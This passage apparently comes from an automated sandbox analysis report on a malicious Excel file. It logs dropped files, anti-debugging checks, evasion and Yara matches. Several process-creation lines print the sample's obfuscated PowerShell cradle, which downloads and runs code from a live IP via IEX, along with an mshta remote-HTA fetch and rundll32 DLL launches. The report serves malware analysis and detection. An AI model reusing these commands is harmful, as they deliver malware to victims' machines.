Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 2548 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 0000000C.00000002.551291217.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B7E00 FindFirstFileW, 16_2_002B7E00
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E4087 mov eax, dword ptr fs:[00000030h] 9_2_002E4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314087 mov eax, dword ptr fs:[00000030h] 10_2_00314087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00784087 mov eax, dword ptr fs:[00000030h] 11_2_00784087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224087 mov eax, dword ptr fs:[00000030h] 12_2_00224087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314087 mov eax, dword ptr fs:[00000030h] 15_2_00314087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C4087 mov eax, dword ptr fs:[00000030h] 16_2_002C4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
Source: Yara match File source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 16.2.rundll32.exe.2d30000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ef0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e50000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d00000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3050000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2470000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3030000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e20000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.950000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2bd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2520000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d90000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED